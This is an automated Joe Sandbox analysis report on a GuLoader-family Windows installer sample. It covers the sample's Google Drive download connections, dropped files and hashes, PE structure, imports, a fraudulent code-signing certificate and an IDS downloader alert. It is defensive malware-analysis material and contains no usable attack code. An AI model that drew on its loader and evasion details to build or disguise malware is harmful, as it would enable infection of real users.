https://drive.google.com/G	eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/a	eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.19.174	drive.google.com	United States		15169	GOOGLEUS	false
142.250.181.33	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1567591
Start date and time:	2024-12-03 17:22:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	eAvqHiIsgR.exe renamed because original name is a hash value
Original Sample Name:	e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7.exe
Detection:	MAL
Classification:	mal76.troj.evad.winEXE@3/8@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 47 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: eAvqHiIsgR.exe

Simulations

Behavior and APIs

Time	Type	Description
11:24:48	API Interceptor	25x Sleep call for process: eAvqHiIsgR.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	kvk78zDZTu.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	w0nz47MlOe.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	w0nz47MlOe.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	gJUrBC17Wh.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	9WdUhQEKvX.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	NX6BOqyG3J.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	AwMu7gR48D.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	NX6BOqyG3J.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	beNxougDFV.exe	Get hash	malicious	GuLoader	Browse	172.217.19.174 142.250.181.33
	Request for Quote and Collaboration Docs.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.217.19.174 142.250.181.33

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll	RFQ-24064562-SUPPLY-NOv-ORDER.com.exe	Get hash	malicious	Remcos, GuLoader	Browse
	LkzvfB4VFj.exe	Get hash	malicious	FormBook, GuLoader	Browse
	LkzvfB4VFj.exe	Get hash	malicious	GuLoader	Browse
	z120X20SO__UK__EKMELAMA.exe	Get hash	malicious	GuLoader, Remcos	Browse
	Quotation-GINC-19-00204.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Produkttyper.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Impressionist.exe	Get hash	malicious	GuLoader	Browse
	PAGO.exe	Get hash	malicious	GuLoader	Browse
	PAGO.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Obstetricated.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\eAvqHiIsgR.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.854450882766351
Encrypted:	false
SSDEEP:	192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
MD5:	34442E1E0C2870341DF55E1B7B3CCCDC
SHA1:	99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
SHA-256:	269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
SHA-512:	4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse Filename: LkzvfB4VFj.exe, Detection: malicious, Browse Filename: LkzvfB4VFj.exe, Detection: malicious, Browse Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious, Browse Filename: Quotation-GINC-19-00204.exe, Detection: malicious, Browse Filename: Produkttyper.exe, Detection: malicious, Browse Filename: Impressionist.exe, Detection: malicious, Browse Filename: PAGO.exe, Detection: malicious, Browse Filename: PAGO.exe, Detection: malicious, Browse Filename: Obstetricated.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\tranchet\Anthracomarti.Ido

Download File

Process:	C:\Users\user\Desktop\eAvqHiIsgR.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	437032
Entropy (8bit):	2.6470522931567846
Encrypted:	false
SSDEEP:	3072:bSnLz72K/yG3pRsYhtRpehLG3a+slQ2huKa:oLz72xGZRsiRpe9CZslQ2huT
MD5:	53118B7494C59D46E9BFD8977F248EDA
SHA1:	2F6C3005A562EB0D187BF751D949FECC3FEA7C9E
SHA-256:	F7A37EC1F6A7E6CA0ECBD78BCC9BCC4801F233E0B5F9156A025CE5723A3D0BEB
SHA-512:	9188CB5A8A1EE5ACAAFB715C5EAEC50C187D2C7DB357AE90C1F7B51AF95E9409681A7B0D119994011F54181A81C18C09EAE6A07BD2E240B4E31185CC15422DD4
Malicious:	false
Reputation:	low
Preview:	00008282828282007B000000001200A7A7A7A700CDCDCD000000C000000000720000FEFE000000005D5D000000DE0000D900080048480000001F1F00C40000EC00A70095950000000080009B00000083830000626262000058585800C3C3C300005100CECE001F1F1F000000AE00000000D600470000002A2A0000006E0000B8B8000000AF00005C000000000070000049000042000200000000000000C1004E000000D2D2009F9F9F9F9F9F000000ABAB00595900000086000000000000006800000C0000620000007B7B00AAAAAAAAAAAA00050505000909000000001300CC00004D4D000000000000230000002B00FB0000006000A7000000180000AFAFAF00000074000065000060000000D900606000000000000000880000000000020003002700CC007300333333000000000075757575757500A600006D6D00777777777700B500C8C8C800002D004F0000989800001400008700FFFF007800001300B40000E90000000000FF000061004C00525252520000000057009F00FF002B0000310000006868686868686868007700007B7B00000000009A9A9A9A9A00C0C0C0007800003C3C00F3F3000098989898980000000082820000B6B600000018004848484800CE0000004100B200848484004C4C4C00B7B70000D800005F001B000040000055550000000046001111110040404000

C:\Users\user\tranchet\Trskelkvotients.Hel

Download File

Process:	C:\Users\user\Desktop\eAvqHiIsgR.exe
File Type:	data
Category:	dropped
Size (bytes):	207640
Entropy (8bit):	7.546004720534882
Encrypted:	false
SSDEEP:	3072:ASesIpE62+wizRgXw/kibtZaVNv4rw9KKRiYeKJSulQB0ClQztX9JnJg2yJ6MKN+:AFsIpGgm/9HteKby0oQznM2Aa+
MD5:	252B537AA9192BBF6F11B925E38F0353
SHA1:	5FA65E7E8E29B9097AE0510E4D405CDC2AF764BC
SHA-256:	44A675E5F8D832568BF91CD9C6D6D393FE4B55D8FE353492CBE5CA42B8FE0002
SHA-512:	FD5EA259314B678A8506BF6C2E47A1C133882F1CDD9F4BF5C82E56AC5E67AE6ED89FAF6A635AB4EDA451074D87B02E17D14191A44E0AD8F40AA08004549ADFA3
Malicious:	false
Reputation:	low
Preview:	...............kk..=...........................W.........s............i.TT.....5.....$......a............)........._......:..............K...9............kkk.....................L.............Z...{..5....u.............................................................88..].................................................C...kk....((.......................>.....j............7777..5.............W...........111.............gggg...............hh.....................'.-............777..........W.................HHH..............."......................u..".............o..XX.......................&....AAA..33.....................I............''...............DD.........7.............................))............S...................g.d..SSS.@@......................-.............i........#............................p....q.............ee.....................................u.........w.......E.#...ooo.cc..........."..e.9..X..........a......?...66.O............<.((.......r...;;........kkkk..r.l..

C:\Users\user\tranchet\computerskrmen.dem

Download File

Process:	C:\Users\user\Desktop\eAvqHiIsgR.exe
File Type:	data
Category:	dropped
Size (bytes):	485127
Entropy (8bit):	1.2565961974341746
Encrypted:	false
SSDEEP:	768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
MD5:	580D05E679E74B036B55CA8E5FF32769
SHA1:	10175C43AB7B725FFFCF770EB2C3555E91D3BA13
SHA-256:	B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
SHA-512:	0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W.............................................................].h.............R..........................................................................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................\|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............

C:\Users\user\tranchet\predictors.dut

Download File

Process:	C:\Users\user\Desktop\eAvqHiIsgR.exe
File Type:	data
Category:	dropped
Size (bytes):	389868
Entropy (8bit):	1.2469892412772452
Encrypted:	false
SSDEEP:	768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
MD5:	2A500E1219C4894E2D45C32C5A5A11FD
SHA1:	AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
SHA-256:	C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
SHA-512:	89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................\|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................

C:\Users\user\tranchet\receptionssekretrer.bin

Download File

Process:	C:\Users\user\Desktop\eAvqHiIsgR.exe
File Type:	data
Category:	dropped
Size (bytes):	442363
Entropy (8bit):	1.2533707838755617
Encrypted:	false
SSDEEP:	1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
MD5:	5465B75724C031B21C018F7D72941F72
SHA1:	98176B27A41A35401A96D0AAC0859EEC25A4C5FE
SHA-256:	7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
SHA-512:	7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
Malicious:	false
Preview:	.........................................................................\|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................

C:\Users\user\tranchet\serenissimi.txt

Download File

Process:	C:\Users\user\Desktop\eAvqHiIsgR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	521
Entropy (8bit):	4.284169749449499
Encrypted:	false
SSDEEP:	12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
MD5:	B089BD0CBC944DE0B1023E6CE9318BD3
SHA1:	715FA74E243D5C3419519E7371ED1836C9BCFA4A
SHA-256:	1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
SHA-512:	A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
Malicious:	false
Preview:	dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.

C:\Windows\Arder.lnk

Download File

Process:	C:\Users\user\Desktop\eAvqHiIsgR.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	734
Entropy (8bit):	3.275980440700818
Encrypted:	false
SSDEEP:	12:8wl01sXU1mGlnEERNEf3w/g/rNJkKAh4t2YZ/elFlSJm:82ovRNj/45HALqy
MD5:	24AC4E1AE1AD82FBCFB5C552050068BB
SHA1:	D74C04463D2C81957E7EC4ACC2A828BE5AB3CC01
SHA-256:	F07C4A5A2C36AE7849EFE287B88923A16243170F6DF8B22E11BA6219EC699AE6
SHA-512:	7FFC3544DB729F30C9739BAAC11490D8E13AE7E23DAA164A2DEFE148A5E454272DA61FD921F427856D37DC2F68F764170990D2C920268352FAFCC2DFF9B81CBC
Malicious:	false
Preview:	L..................F........................................................?....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.i.s.a.n.n.e.x...A.n.d.3.7.$.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.540997501747662
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	eAvqHiIsgR.exe
File size:	882'600 bytes
MD5:	61518cfded3109fac04ee916ab275c26
SHA1:	c624a4ee78183d82fb8264f74953d32ddcae5481
SHA256:	e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7
SHA512:	478737a68a76e03b10e477a47115eb643e9c7242e5a5d7ef0c635060cb0318fd185c6be59793ba66057f811d6f623c68daabd5dfddcc8c3d4dc4d9b8be7096af
SSDEEP:	24576:yiGFaq43NvC7kHJTPrbG4ujTrlq8e+xfJ/QOeaq:yiGFu3Nv3HJTkdde+tJ/qaq
TLSH:	11151266F700D89AE8758F31982EC146E7E4BE2918641B5B3F9ABF2FBCB2050D10F515
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...\|......H3............@

File Icon


Icon Hash:	0e13672535353f1c

Static PE Info

General

Entrypoint:	0x403348
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Biose Etherising Snoreassistenterne ", E=Thyroidectomy@Grasserie.Rat, L=Millersburg, S=Kentucky, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	11/02/2024 10:37:17 10/02/2027 10:37:17
Subject Chain	CN="Biose Etherising Snoreassistenterne ", E=Thyroidectomy@Grasserie.Rat, L=Millersburg, S=Kentucky, C=US
Version:	3
Thumbprint MD5:	07F4C9648CE525564FACE18D1081137B
Thumbprint SHA-1:	B05FDEA76018F6B4F74CA880D732D7C4CFAE9B3A
Thumbprint SHA-256:	3F87A7BAF788D5593E84370B6F3D6C86548799431B126CFF6183A98F77C743B6
Serial:	569C0070FED303446D97771BD262BA0ED17A9696

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F42Ch], eax
je 00007FA2CC8C7AC3h
push ebx
call 00007FA2CC8CAC26h
cmp eax, ebx
je 00007FA2CC8C7AB9h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007FA2CC8CABA2h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FA2CC8C7A9Dh
push 0000000Bh
call 00007FA2CC8CABFAh
push 00000009h
call 00007FA2CC8CABF3h
push 00000007h
mov dword ptr [0042F424h], eax
call 00007FA2CC8CABE7h
cmp eax, ebx
je 00007FA2CC8C7AC1h
push 0000001Eh
call eax
test eax, eax
je 00007FA2CC8C7AB9h
or byte ptr [0042F42Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429850h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x58000	0x41dd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd63f8	0x13b0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6457	0x6600	f6e38befa56abea7a550141c731da779	False	0.6682368259803921	data	6.434985703212657	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	569269e9338b2e8ce268ead1326e2b0b	False	0.4625	data	5.2610038973135005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25538	0x600	17edd496e40111b5a48947c480fda13c	False	0.4635416666666667	data	4.133728555004788	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x28000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x58000	0x41dd0	0x41e00	51f103b856396aac282c5bd5a24beff1	False	0.6063619248102466	data	5.8960782160116745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x583b8	0x130ca	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.998410786148207
RT_ICON	0x6b488	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.40775464332189754
RT_ICON	0x7bcb0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.4554866512507883
RT_ICON	0x85158	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560	English	United States	0.462218045112782
RT_ICON	0x8b940	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.4729667282809612
RT_ICON	0x90dc8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.46835144071799717
RT_ICON	0x94ff0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5149377593360995
RT_ICON	0x97598	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5457317073170732
RT_ICON	0x98640	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6073770491803279
RT_ICON	0x98fc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6719858156028369
RT_DIALOG	0x99430	0x100	data	English	United States	0.5234375
RT_DIALOG	0x99530	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x99650	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x99718	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x99778	0x92	Targa image data - Map 32 x 12490 x 1 +1	English	United States	0.7191780821917808
RT_VERSION	0x99810	0x27c	data	English	United States	0.5
RT_MANIFEST	0x99a90	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-03T17:24:46.747488+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49883	172.217.19.174	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 17:24:44.086440086 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:44.086477041 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:44.086549997 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:44.096255064 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:44.096271038 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:45.842256069 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:45.842343092 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:45.843122005 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:45.843185902 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:45.930641890 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:45.930669069 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:45.931124926 CET	443	49883	172.217.19.174	192.168.2.5
